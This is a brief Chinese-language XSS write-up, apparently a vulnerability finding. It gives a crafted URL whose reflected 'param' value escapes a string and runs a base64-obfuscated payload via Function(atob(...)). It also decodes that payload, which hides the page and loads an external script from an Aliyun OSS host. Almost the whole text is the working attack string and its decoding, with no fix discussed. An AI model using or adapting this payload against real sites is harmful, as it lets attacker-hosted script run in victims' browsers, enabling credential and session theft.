url:
http://xxx.xxx/location?param=Param%27%22;Function(atob(%27ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQoZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0JykpLnNyYz0nLy9iLWItY24ub3NzLWNuLWJlaWppbmcuYWxpeXVuY3MuY29tL3gnO3Rocm93IDA=%27))();throw%200;//
其中的atob内容为base64编码内容:
"document.documentElement.hidden=1;document.head.appendChild(document.createElement('script')).src='//b-b-cn.oss-cn-beijing.aliyuncs.com/x';";
param在界面会反显;会出现xss攻击;